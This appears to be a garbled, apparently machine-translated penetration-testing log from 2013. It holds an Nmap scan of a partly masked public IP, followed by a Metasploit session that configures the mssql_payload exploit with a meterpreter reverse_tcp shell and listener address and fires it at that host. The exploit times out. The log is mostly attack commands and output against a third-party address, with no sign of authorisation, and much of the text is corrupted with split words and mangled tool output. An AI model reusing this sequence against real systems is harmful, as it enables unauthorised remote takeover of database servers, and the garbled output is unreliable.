Penetration notes -2013-07-13 Windows/mssql/mssql_payload

Scan starting Nmap 5.30beta1 (http://nmap.org) at 2011-05-06 09:36 China standard Time nse:loaded scripts for scanning.  Initiating ping scan at 09:36 scanning 203.171.239.* [4 ports] completed ping scan in 09:36, 0.90s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. At 09:36 completed Parallel DNS resolution of 1 host. At 09:36, 0.03s elapsed initiating SYN Stealth Scan at 09:36 scanning 203.171.239.* [ports] discovered open port 3389 /TCP on 203.171.239.* discovered open ports 80/tcp on 203.171.239.* discovered open ports 3306/tcp on 203.171.239.* Discover Ed Open port 21/tcp on 203.171.239.* completed SYN Stealth Scan at 09:36, 33.18s elapsed (+ total ports) initiating Ser Vice scan at 09:36 Scanning 4 services on 203.171.239.* completed Service scan at 09:37, 6.07s elapsed (4 services on 1 ho  ST) Initiating OS Detection (try #1) against 203.171.239.* retrying OS detection (try #2) against 203.171.239.* initiating Traceroute at 09:37 completed Traceroute at 09:37, 0.06s Elapsed initiating Parallel DNS resolution of 1 host. At 09:37 completed Parallel DNS resolution of 1 host. At 09:37, 0.03s elapsed nse:script scanning 203.171.239.*. Nse:starting RunLevel 1 (of 1) scan. Initiating NSE at 09:37 completed NSE at 09:37, 5.22s elapsed nse:script scanning completed. Nmap Scan Report for 203.171.239.* Host was up (0.043s latency). Not shown:994 filtered ports PORT State SERVICE VERSION 21/tcp open ftp Microsoft ftpd 25/tcp closed SMTP 80/tcp open htt P Microsoft IIS httpd |_http-methods:no allow or public header in OPTIONS response (status code) |_html-title:site D OESN ' t has a title (text/html). 110/TCP closed POP3 3306/tcp open mysql mysql 5.1.32-community | Mysql-info:protocol:10 | version:5.1.32-community | Thread id:30457 | Some capabilities:long passwords, Connect with DB, Compress, ODBC, transactions, Secure Connection |  Status:autocommit |_salt:<*[k+0o~o "Target=_blank>[email protected] "; By^j5k<*[k+0o~o3389/tcp Open microsoft-rdp Microsoft Terminal Service Device type:general purpose|media device Running (JUST guessin G): Microsoft Windows 2003| XP (93%), Motorola Windows pocketpc/ce (85%) Aggressive OS guesses:microsoft Windows Server 2003 SP1 or SP2 (93%), Microsoft Windows Server 2003 SP1 (92%), Microsoft Windows Server 2003 SP2 (91%), Microsoft Windows XP Professional SP3 (85%), Microsoft Windows XP SP2 (85%), Microsoft Wind oWS XP SP3 (85%), Motorola VIP1216 Digital set top box (Windows CE 5.0) (85%) No exact OS matches for host (test conditions non-ideal). Network distance:1 Hop TCP Sequence prediction:difficulty=262(Good luck!) IP ID Sequence generation:busy Server or unknown class Service Info:OS:Windows TRACEROUTE (using port 25/tcp) HOP RTT A Ddress 1 50.00 ms 203.171.239.* Read data Files From:d:\metasploit\nmap OS and Service detection performed. Incorrect results at http://nmap.org/submit/. Nmap done:1 IP Address (1 host up) scanned in 54.32 seconds Raw packets sent:2095 (95.768KB) | rcvd:251 (223.649KB) Start taking station Welcome to the Metasploit Web console! _ _ _ | | (_)_ ____ ____| |_ ____ ___ ____ | | ___ _| |_ | \ / _ ) _)/ _ |/___) _ \| |/ _ \| | _) | | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__ |_|_|_|\____)\___)_|| _(___/| || _/|_|\___/|_|\___) |_| =[ Metasploit V3.4.2-dev [core:3.4 api:1.0] +----=[ 566 exploits-283 Auxiliary +----=[ payloads-27 encoders-8 Nops=[ svn r9834 updated 296 days ago (2010.07.14) warning:this copy of the Metasploit Framework is last updated 296 days a Go. We recommend the framework at least every. For information in updating your copy of Metasploit, please see:http://www.metasploit.com/redmine/projects/framework/ Wiki/updating>> Use windows/mssql/mssql_payload >> info windows/mssql/mssql_payload name:microsoft SQL Server payload Exe  Cution version:9669 platform:windows privileged:no license:metasploit Framework License (BSD) rank:excellent Provided By:david Kennedy "rel1k"<kennedyd013@gmail. com>Jduck<Jduck@metasploit. com> Available targets:id Name------0 Automatic Basic options:name current Setting Required Description---------------- ----------------------PASSWORD no The PASSWORD for the specified username RHOST yes the target address rport 1433 Yes T He target Port USERNAME sa no the USERNAME to authenticate as Usecmdstager true no Wait for user input before returning FR Om exploit VERBOSE false no Enable VERBOSE output Payload information:Description:This module would execute an arbitrary Payload on a Microsoft SQL Server, using the Windows debug.com method for writing a executable to disk and the Xp_cmdshel L Stored procedure. File size restrictions is avoided by incorporating the Debug bypass method presented at Defcon-Securestate. Note that this module would leave a Metasploit payload in the Windows System32 directory which must be manually deleted Onc E The attack is completed. references:http://cve.mitre.org/cgi-bin/cvename.cgi?name=2000-0402 http://www.osvdb.org/557 http://www.securityfocus.com/bid/1281 http://cve.mitre.org/cgi-bin/cvename.cgi?name=2000-1209 http://www.osvdb.org/15757 http ://www.securityfocus.com/bid/4797 http://www.thepentest.com/presentations/FastTrack_ShmooCon2009.pdf >> use Windows/mssql/mssql_payload >> Set Payload windows/meterpreter/reverse_tcp payload = windows/meterpreter/ REVERSE_TCP >> Show Options Module options:name current Setting Required Description--------------------------- -----------PASSWORD No The PASSWORD for the specified username RHOST yes the target address Rport 1433 yes the target por T USERNAME sa no the USERNAME to authenticate as Usecmdstager true no Wait for user input before returning from exploit VE Rbose false No Enable verbose output Payload options (windows/meterpreter/reverse_tcp): Name current Setting Required Desc Ription--------------------------------------exitfunc Process Yes Exit Technique:seh, thread, process lhost Yes Listen address Lport 4444 Yes the listen port EXPLoit target:id Name------0 Automatic >> set RHOST 203.171.239.* RHOST = 203.171.239.* >> Set Lhost 172 .16.2.101 Lhost = 172.16.2.101 >> exploit [*] Started reverse handler on 172.16.2.101:4444 [-] exploit failed:t He connection timed out (203.171.239.*:1433). [*] Exploit completed, but no session is created.

Penetration notes -2013-07-13 windows/mssql/mssql_payload